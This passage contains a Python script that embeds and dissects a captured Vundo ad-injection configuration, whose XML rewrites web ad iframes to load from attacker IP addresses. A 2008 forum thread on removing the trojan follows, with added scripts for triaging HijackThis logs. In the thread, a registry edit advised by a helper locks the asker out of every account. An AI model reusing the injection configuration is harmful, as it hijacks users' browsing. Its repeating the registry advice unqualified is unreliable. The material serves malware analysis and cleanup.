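<CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options>
<commands><command name="code_modify"><actions><action name="replace"><initial_values>
<initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value>
<initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value>
</initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values>
</action></actions></command></commands></CAMPAIGN>
<CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options>
<commands><command name="code_modify"><actions><action name="replace"><initial_values>
<initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value>
<initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value>
</initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values>
</action></actions></command></commands></CAMPAIGN>
</CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>"""

O4_RE = re.compile(r"^O4 - (?P<hive>.+?)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<cmd>.+)$")
GENERATED_NAME_RE = re.compile(r"^[A-Za-z]{1,3}[0-9a-fA-F]{6,}$")  # short prefix + hex blob, e.g. BM870dc8a8
DLL_RE = re.compile(r'"?([^",]+\.dll)"?', re.I)
URL_RE = re.compile(r"""https?://[^\s'"<>]+""")
SIZE_RE = re.compile(r"sz=(\d+x\d+)")


def triage_o4(text):
    """One dict per O4 Run entry, with the reasons (possibly none) it deserves a closer look."""
    findings = []
    for line in text.splitlines():
        m = O4_RE.match(line.strip())
        if not m:
            continue
        name, cmd = m.group("name"), m.group("cmd")
        exe = cmd.split()[0].strip('"').lower()
        reasons = []
        if exe.endswith("rundll32.exe"):
            # The host binary is a legitimate Windows file; the DLL it is told to load is the artefact.
            dll = DLL_RE.search(cmd)
            reasons.append("rundll32 loads " + (dll.group(1) if dll else "<unparsed>"))
        if GENERATED_NAME_RE.match(name):
            reasons.append("value name looks machine-generated")
        if "\\" not in exe:
            reasons.append("bare filename, resolved through the search path")
        findings.append({"hive": m.group("hive"), "name": name, "command": cmd, "reasons": reasons})
    return findings


def decode_cookie(value):
    """Cookie values are base64 with '#' standing in for '=' padding (inferred from the page's values)."""
    raw = value.rstrip("#")
    return base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("ascii", "replace")


def extract_campaign_iocs(xml_text):
    """Hosts, targeted ad sizes and decoded cookies from the campaign XML."""
    root = ET.fromstring(xml_text)
    report = {"campaigns": [], "hosts": set(), "cookies": {}}
    for camp in root.iter("CAMPAIGN"):
        sizes, hosts = set(), set()
        for iv in camp.iter("initial_value"):
            re.compile(iv.text, re.I | re.S)  # sanity check: the file's regexes are Python-compatible
            sizes.update(SIZE_RE.findall(iv.text))
        for nv in camp.iter("new_value"):
            hosts.update(urlparse(u).hostname for u in URL_RE.findall(nv.text))
        report["hosts"] |= hosts
        report["campaigns"].append({
            "name": camp.get("name"),
            "id": camp.get("id"),
            "max_matches": int(camp.find("./options/option[@name='count']").get("value")),
            "targets_ad_size": sorted(sizes),
            "injects_hosts": sorted(hosts),
        })
    for c in root.iter("COOKIE"):
        key, _, val = c.text.partition("=")
        report["cookies"][key] = decode_cookie(val)
    report["hosts"] = sorted(report["hosts"])
    return report


if __name__ == "__main__":
    for f in triage_o4(SAMPLE_O4):
        print(f["hive"], f["name"], "->", f["reasons"] or "nothing notable")
    r = extract_campaign_iocs(SAMPLE_XML)
    print("hosts to block or hunt for:", r["hosts"], "cookies:", r["cookies"])
```

Run as a script it prints one line per Run entry and the indicator summary; the reasons are prompts for a human, not verdicts, since plenty of legitimate software also starts a DLL through rundll32 from a Run key. What the XML part yields for a hunt is the pair of hosts the replacement iframes load from and the list of standard ad sizes the campaigns rewrite, which is why the asker saw pages render with broken ad slots once McAfee had only half-removed the DLL.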

This Question has been solved and asker verified.

Asked On: 2008-01-27 at 13:31:57
ID: 23115046
Topics: HijackThis Software, Windows XP Operating System, Anti-Spyware
Participating Experts: 5
Points: 250
Comments: 36

Answers

 

by: rhythmluvr | Posted on 2008-01-27 at 13:37:47 | ID: 20755344

Avast AntiVirus Home Edition (Free) has a great feature, during the install it will ask whether you would like to perform a pre-boot scan of your system. During the next reboot it will scan your system before it fully loads the operating system, I have used this to get rid of stubborn malware that other programs will not remove. I have installed this program with other AntiVirus on the system already, it will warn you that it found another AV program but once the pre-scan has been performed you can remove it.

It is the only software I have seen with this feature.

 

by: IndiGenus | Posted on 2008-01-27 at 13:49:31 | ID: 20755379

Certainly looks like Vundo/Conhook Trojan to me...

Download and Run ComboFix (by sUBs)

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your Anti-virus and any real-time Anti-spyware monitors that are running.
Then double click Combofix.exe & follow the prompts.
When finished, it will produce a log for you. Upload that log in your next reply with a new HijackThis log.  

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Note 1: Do not mouseclick combofix's window while it's running. That may cause it to stall.
Note 2: Remember to re-enable your Anti-virus and Anti-spyware.

NOTE: If you have issues connecting to your network or internet after running combofix you can either simply reboot, or do the following:
* Go to Control Panel > Network Connections.
* Right-click on the Network icon & select "Repair"
or
Alternately, if the Network icon appears in the notification area in the lower right corner of Desktop, right-click it, and then click Repair from the shortcut menu.

PLEASE ALSO NOTE: Combofix will typically fix most and sometimes all Malware entries but many times a script is also needed to finish cleaning up. So please keep CF until advised whether you need the script or not.

 

by: chilternPC | Posted on 2008-01-27 at 15:27:40 | ID: 20755752

Once you have cleared this problem (I use Spybot myself, from here:
http://www.safer-networking.org/en/index.html) and the free Windows Defender from microsnot.

To stop persistent malware: do not let teenagers use the PC; do not click on links in email; do not visit dodgy sites (those enticing adverts or pop-ups - always click the red cross); do not use P2P software such as LimeWire, BitTorrent, BearShare;
do not click on links in MSN Messenger.

 

by: rpggamergirl | Posted on 2008-01-27 at 15:33:32 | ID: 20755771

The absence of the O2 and O20 lines in HijackThis is the sign of a vundo/conhook infection, so I agree with IndiGenus that running Combofix is a good idea, and anyway bad files showing in the log can be removed using its CFScript function.

The IP address that's showing there looks very much like a wareout infection, and so does the symptom you mentioned, so I think it could also be a wareout infection.

Try running Fixwareout also.
Please download FixWareout from one of these sites:
http://downloads.subratam.org/Fixwareout.exe
http://download.bleepingcomputer.com/lonny/Fixwareout.exe

Save it to your desktop and run it. Click Next, then Install, then make sure "Run fixit" is checked and click Finish. The fix will begin; follow the prompts. You will be asked to reboot your computer; please do so. Your system may take longer than usual to load; this is normal.

At the end of the fix, you may need to restart your computer again.

 

by: orangutang | Posted on 2008-01-27 at 15:42:03 | ID: 20755800

Also, SUPERAntiSpyware (http://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE) and remove:
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s

 

by: steve0412 | Posted on 2008-01-28 at 02:34:11 | ID: 20757990

I have come to this conclusion, after I discovered a Zatacka icon on the desktop of a user:

Zatacka is a popular arcade-type game. It is available on download from reliable sources such as sourceforge (http://zatacka.sourceforge.net/index.php?id=authors).

My 15-year-old daughter enjoys this game, but one day she wanted to play it on another PC here, so she downloaded it, from an unreliable source it seems. Zatacka.exe was a 46kb exe file that installed to the desktop. After she found that nothing happened when she tried to start it, she tried to remove it - she could not.

At about the same time, we started to get a lot of pop-ups from partypoker, statcounter, tradedoubler, 2o7, Clickxchange, Linksynergy, advanced, bizadverts, dk.advancedcleaner, secure.advancedcleaner and zedo. At the same time it seems, the trojan, vundo was installed.

The mechanism seems to be that an XML file, BM870dc8a8, is installed in the Windows directory and run on starting a browser. This came to our attention when web pages stopped loading completely. This XML file calls rundll32.exe, which runs DLLs installed in system32 (with names such as 'djshrhsg.dll').

If you use Hijackthis, or startup monitor to remove the command from the HKLM run section, it immediately clones itself.

The way to remove it is to start Windows in safe mode with command prompt and use the 'DEL' command.

McAfee Security Suite, SpyHunter 3, Spy Eraser or RogueRemover pro did not detect this problem.

Has anyone heard of this before, and do you think I have nailed the problem?
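As an added example (not from the thread or from any of the tools named in it), here is a small Python triage script that applies the indicators the posters rely on to constructed HijackThis-style lines: a Run value named BM followed by 8 hex digits launching Rundll32.exe on a random-named system32 DLL, and an unknown Winlogon Notify package. The allowlist of stock XP Notify subkeys is my assumption; build your own from a known-clean machine.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample, modelled on the HijackThis lines quoted in this thread, plus two
# benign entries (ctfmon and crypt32chain) so the script has something to ignore.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKLM\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O20 - Winlogon Notify: iifggff - iifggff.dll (file missing)
O20 - Winlogon Notify: crypt32chain - crypt32.dll
"""

# Winlogon Notify subkeys on a stock XP SP2 box: an assumed, partial allowlist.
KNOWN_NOTIFY = {"crypt32chain", "cryptnet", "cscdll", "sccertprop", "schedule",
                "sclgntfy", "senslogn", "termsrv", "wlballoon"}

RUN_RE = re.compile(r'^O4 - (?P<hive>HK\w+)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<cmd>.+)$')
NOTIFY_RE = re.compile(r'^O20 - Winlogon Notify: (?P<name>\S+) - (?P<dll>\S+)(?P<rest>.*)$')
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+\.dll)"?', re.IGNORECASE)
RANDOM_NAME_RE = re.compile(r'^[a-z]{5,8}$')      # e.g. sslnpilc, djshrhsg, iifggff
VUNDO_VALUE_RE = re.compile(r'^BM[0-9a-f]{8}$')     # e.g. BM870dc8a8


@dataclass
class Finding:
    line: str
    reason: str


def triage(log_text: str) -> List[Finding]:
    """Return the HijackThis O4/O20 lines that match the Vundo-style indicators."""
    findings: List[Finding] = []
    for line in (raw.strip() for raw in log_text.splitlines()):
        m = RUN_RE.match(line)
        if m:
            r = RUNDLL_RE.match(m.group("cmd"))
            if not r:
                continue                 # Run entries not using rundll32 are out of scope here
            dll = r.group("dll")
            stem = dll.replace("\\", "/").rsplit("/", 1)[-1][:-4].lower()
            reasons = []
            if VUNDO_VALUE_RE.match(m.group("name")):
                reasons.append("value name matches the BM<8 hex> pattern")
            if "system32" in dll.lower() and RANDOM_NAME_RE.match(stem):
                reasons.append("rundll32 loads a random-named DLL from system32")
            if reasons:
                findings.append(Finding(line, "; ".join(reasons)))
            continue
        m = NOTIFY_RE.match(line)
        if m:
            name = m.group("name").lower()
            if name not in KNOWN_NOTIFY and RANDOM_NAME_RE.match(name):
                reason = "unknown Winlogon Notify package with a random-looking name"
                if "file missing" in m.group("rest"):
                    reason += " (DLL already gone: orphaned registry entry, safe to fix)"
                findings.append(Finding(line, reason))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f.reason}\n    {f.line}")
```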

 

by: chilternPC | Posted on 2008-01-28 at 02:39:23 | ID: 20758015

The best way to 'nail the problem' for the future is limited or no accounts for children!! (or even better, their own PCs) :-)

 

by: IndiGenus | Posted on 2008-01-28 at 03:36:31 | ID: 20758219

Yes we have heard of it. It is Vundo/Conhook Trojan and is very (unfortunately) common these days. Combofix and typically a follow up script with it deals with it very nicely. There is even a new variant that infects .exe files, causing start up programs to fail. CF would have also dealt with this nicely.

Dave

 

by: steve0412 | Posted on 2008-01-28 at 03:36:48 | ID: 20758221

Ralph Nader once wrote a book "Unsafe at Any Speed:The Designed-In Dangers of the American Automobile". There should be one called "Unsafe at Any Speed :The Designed-In Dangers of the Internet".

 

by: IndiGenus | Posted on 2008-01-28 at 03:38:12 | ID: 20758226

Sorry forgot to mention...no way for us to know if you solved the problem. Have the issues disappeared?

 

by: steve0412 | Posted on 2008-01-28 at 04:33:51 | ID: 20758403

The problem is solved, but I figure that I got there myself. However, I am grateful for the good advice, so I will split the points

 

by: steve0412 | Posted on 2008-01-28 at 05:24:52 | ID: 20758629

I spoke too soon. Opened another user profile and bang! There it is again. I am running ComboFix now, but am worried by an instruction conflict in swreg.cfexe. I have clicked through and CF is scanning.

 

by: steve0412 | Posted on 2008-01-28 at 05:39:08 | ID: 20758726

Please see log and comment?

 

by: IndiGenus | Posted on 2008-01-28 at 07:49:38 | ID: 20760040

Heavily infected machine...had a "feeling" you would be back, or have to make another post. Give me a little and I'll put a CFScript together for you if you like.

 

by: IndiGenus | Posted on 2008-01-28 at 08:29:49 | ID: 20760504

1. Open Notepad.

2. Now copy/paste the text between the lines below into the Notepad window:

---------------------------------------------------------------------------------------------------------------

File::
C:\WINDOWS\system32\bxxogiao.pest
C:\WINDOWS\system32\sslnpilc.pest
C:\WINDOWS\system32\qcsqhaif.pest
C:\WINDOWS\BM870dc8a8.xml
C:\WINDOWS\system32\djjhkdec.pest
C:\WINDOWS\system32\tryjvick.pest
C:\WINDOWS\BM870dc8a8crap2.xml
C:\WINDOWS\system32\lhpyevon.pest
C:\WINDOWS\system32\wecswpwi.pst
C:\WINDOWS\system32\fqrhbddy.pest
C:\WINDOWS\system32\tynlomju.pest
C:\WINDOWS\BM870dc8a8crap.xml
C:\WINDOWS\system32\adubyivx.pest
C:\WINDOWS\system32\ivlrtwlu.pest
C:\WINDOWS\system32\eqqgqcix.pest
C:\WINDOWS\system32\gocjemjp.pest
C:\WINDOWS\system32\gntwwwhr.pest
C:\WINDOWS\system32\pacrbsma.pest
C:\WINDOWS\system32\lfweeymi.pest
C:\WINDOWS\system32\dsfkbpgr.pest
C:\WINDOWS\system32\icxujaoj.pest
C:\WINDOWS\system32\kaprwtgk.pest
C:\WINDOWS\system32\pgtxwmij.pest
C:\WINDOWS\system32\iikfvcsp.pest
C:\WINDOWS\system32\hesrnwym.pest
C:\WINDOWS\system32\lljrmkln.pest      
C:\WINDOWS\system32\nomnvppa.pest
C:\WINDOWS\system32\jbbmbeig.pest
C:\WINDOWS\system32\ncprincn.pest
C:\WINDOWS\system32\eocymiir.pest
C:\WINDOWS\system32\ffmhrwss.pest
C:\WINDOWS\system32\qjitcugg.pest
C:\WINDOWS\system32\sardsvqh.pest
C:\WINDOWS\system32\iifggff.dll
C:\WINDOWS\system32\mljgh.dll

Registry::
[-HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\iifggff]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

---------------------------------------------------------------------------------------------------------------

3. Save the above as CFScript.txt on your desktop.

4. Then drag the CFScript.txt into ComboFix.exe. This will start ComboFix again.

5. After reboot, (in case it asks to reboot), please upload the following reports/logs.

-Combofix.txt
-A new HijackThis log ~ From each user account

 

by: steve0412 | Posted on 2008-01-28 at 12:23:33 | ID: 20762498

Before I do that, please be aware that these files have been renamed by me. They were .dll files. Shall I perform the task anyway or should I rename them back to .dll?

 

by: steve0412 | Posted on 2008-01-28 at 12:24:42 | ID: 20762506

actually, it is self-explanatory, so I will perform the task 'as is'

 

by: IndiGenus | Posted on 2008-01-28 at 13:02:46 | ID: 20762861

Yes just to confirm "as is". They are all Vundo files. I thought one of the security programs you tried may have renamed them but the extension did look a little funny...

 

by: steve0412 | Posted on 2008-01-28 at 14:33:20 | ID: 20763608

Hi

I followed instructions but nothing happened, so I tried to run ComboFix and copy the CFScript.txt to the blue window. It has not removed the files. I am including the log, script and 5 HijackThis log files.

NB. I had ms Process Explorer installed on this PC. Has combofix removed it?

 

by: steve0412 | Posted on 2008-01-28 at 14:49:12 | ID: 20763757

Just a comment (not really to do with the problem in hand, but anyway)
Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!

 

by: IndiGenus | Posted on 2008-01-28 at 15:08:38 | ID: 20763908

The script didn't run because you are not running combofix from the desktop. Combofix needs to be put directly on the desktop. Do the same with the script .txt file. Then drag the txt file onto CF... that should do it. Then post the logs...

 

by: steve0412 | Posted on 2008-01-28 at 15:18:58 | ID: 20763975

Combofix is on the desktop, not a shortcut, but where it was installed. If I drag the file in (also on the desktop) , the loading bar starts, a flash of blue screen then nothing (how long do I wait? 20 minutes?)

 

by: rpggamergirl | Posted on 2008-01-28 at 16:13:12 | ID: 20764274

Combofix instructions say to run it from the desktop, maybe because that's easier, but even if it wasn't, the CFScript still should work as long as it's in the same location as Combofix.exe. Just wait and let it run, even for 20 minutes.


>>>Considering that we are talking about removing pests, it amazes me that by opening experts-exchange, adware pests namely adtech, tribalfusion and e2.emediate cookies are placed on my PC!<<<

Tribal Fusion feeds the advertising for EE, and of course EE gets paid for displaying these ads on their pages, but Premium members don't have these ads.

 

by: IndiGenus | Posted on 2008-01-28 at 16:53:48 | ID: 20764512

Forgive my ignorance on this...

This is where cf is located:

C:\Documents and Settings\Anne\Skrivebord\ComboFix.exe

What is Skrivebord? Is it another language for desktop?

 

by: rpggamergirl | Posted on 2008-01-28 at 18:04:32 | ID: 20764894

I think in Norwegian Windows XP the Desktop is called --> Skrivebord, :)

And "Escritorio" in Spanish
C:\Documents and Settings\Owner\Escritorio\ComboFix.exe

 

by: IndiGenus | Posted on 2008-01-28 at 18:16:34 | ID: 20764944

From your HijackThis logs...this is the only entry I'm seeing as bad. Looks like it's at least partly fixed. You can have Hijackthis fix the item.

O20 - Winlogon Notify: iifggff - iifggff.dll (file missing)

See if that helps.

 

by: steve0412 | Posted on 2008-01-29 at 03:28:05 | ID: 20766859

No luck with dropping the script file on the icon. It starts, but no log is produced, and the files are still there. Can I remove the files manually?

 

by: IndiGenus | Posted on 2008-01-29 at 06:37:15 | ID: 20768046

Yes, you can remove the files manually, but there is one registry entry that still is bad.

This, which is bad...
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Authentication Packages      REG_MULTI_SZ         msv1_0 C:\WINDOWS\system32\mljgh.dll

Should be this..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"Authentication Packages"=hex(7):6d,73,76,31,5f,30,00,00

If you are comfortable editing the registry you can do it manually.

 

by: steve0412 | Posted on 2008-01-29 at 07:47:13 | ID: 20768802

No, I wouldn't know, unless it is to replace the current text with the string provided, but I am sure it is not. Is it still a REG_MULTI_SZ? Or do I enter the string in binary? Sorry about the lack of knowledge in this department, but I don't want to screw the registry up!!!

 

by: IndiGenus | Posted on 2008-01-29 at 10:44:31 | ID: 20770747

First you should back up your registry, especially if you're not comfortable with editing it.

You are going to go to the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa key.
When you navigate to "Authentication Packages" under the name heading in your registry, it will be:

Type: REG_MULTI_SZ
Data: msv1_0
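Added example, not from the thread or from ComboFix: a Python decoder and encoder for the hex(7) literal quoted in the Registry:: line above, plus a check that flags any extra entry in Authentication Packages. It shows that the CFScript value is just REG_MULTI_SZ containing exactly msv1_0, so the manual fix is to remove the rogue DLL entry while keeping the value type and msv1_0 as they are. The sample "infected" value is constructed from the export shown in the thread.

```python
from typing import List

# Stock XP content of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages,
# as quoted in the thread. Anything else listed here is loaded into lsass.exe at boot.
EXPECTED_AUTH_PACKAGES = ["msv1_0"]


def decode_hex7(literal: str) -> List[str]:
    """Decode a REGEDIT4/CFScript 'hex(7):6d,73,...' literal into the REG_MULTI_SZ
    it encodes: NUL-terminated strings, one byte per character, ending in a second NUL."""
    prefix = "hex(7):"
    if not literal.lower().startswith(prefix):
        raise ValueError("not a hex(7) (REG_MULTI_SZ) literal")
    raw = bytes(int(b, 16) for b in literal[len(prefix):].split(",") if b.strip())
    if len(raw) < 2 or raw[-2:] != b"\x00\x00":
        raise ValueError("REG_MULTI_SZ must end with a double NUL")
    body = raw[:-2]
    return [s.decode("latin-1") for s in body.split(b"\x00")] if body else []


def encode_hex7(strings: List[str]) -> str:
    """Inverse of decode_hex7: build the hex(7) literal for a list of strings."""
    raw = b"".join(s.encode("latin-1") + b"\x00" for s in strings) + b"\x00"
    return "hex(7):" + ",".join(f"{b:02x}" for b in raw)


def audit_auth_packages(current: List[str]) -> List[str]:
    """Return the entries that do not belong in Authentication Packages.
    Only these are removed; the value stays REG_MULTI_SZ with msv1_0 intact."""
    expected = {p.lower() for p in EXPECTED_AUTH_PACKAGES}
    return [p for p in current if p.lower() not in expected]


if __name__ == "__main__":
    cfscript_line = "hex(7):6d,73,76,31,5f,30,00,00"    # the Registry:: line from the thread
    print("CFScript sets the value to:", decode_hex7(cfscript_line))
    # Constructed from the infected machine's export as shown in the thread.
    infected = ["msv1_0", r"C:\WINDOWS\system32\mljgh.dll"]
    print("rogue entries to remove:", audit_auth_packages(infected))
    print("clean literal:", encode_hex7(EXPECTED_AUTH_PACKAGES))
```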

 

by: steve0412 | Posted on 2008-01-30 at 01:25:43 | ID: 20775728

Ok, is this a bad joke?

I did as instructed and now Windows is asking me for a login password for all the accounts on that PC. As no password was set, I am at a loss what to do. I have tried 'administrator' to no avail.

Please advise.

 

by: steve0412 | Posted on 2008-01-30 at 01:38:51 | ID: 20775782

OK, I have recovered the system from the 'last known good etc.'. That was one helluva change in the registry! Now, what do I have to do to the user accounts to make the registry change and not have the same problem of totally locked-down accounts?

 

by: IndiGenus | Posted on 2008-01-30 at 05:34:13 | ID: 20776819

OK? I'm confused on several things here.

1. You are saying that last registry change made this happen?
2. Did you make a backup of the registry before doing the change as I had advised? If so you could have just reverted to that.

That change if done properly should not have caused that to happen and I'm not sure what's going on here.

If you went to Last Known Good Configuration then it should have just brought you back to where you were before.

Is this an English version of XP, or another language? I had commented about the Skrivebord (Desktop) earlier. I'm wondering if that had something to do with it.

 

by: steve0412 | Posted on 2008-01-30 at 10:57:16 | ID: 20779891

1. Yes, because the only thing changed in the registry was changing the entry as proposed.

2. Yes, I did, and that is why I could recover.

This is Danish XP. When I tried to log on, including the administrator account in Safe Mode, it said that I had limited permission. Since I don't run with passwords on that PC (yes - I know - stupid!) there were no passwords to enter. I tried 'admin', 'administrator', 'password'.

 

by: IndiGenus | Posted on 2008-01-30 at 11:12:46 | ID: 20780068

I cannot say for sure, but since this PC is Danish maybe the reg entry would be different??? I obviously really only deal with US, as you can tell by the fact that I didn't know what "skrivebord" meant.

Maybe rpg will look in here with a suggestion.

 

by: steve0412 | Posted on 2008-02-01 at 01:07:20 | ID: 31425501

There is still the point of the change in the registry, which blocked access to the user accounts. This may be an issue with language versions (Danish) of Windows XP. I would like to know that I have fully removed the threat and that I am protected in the future.
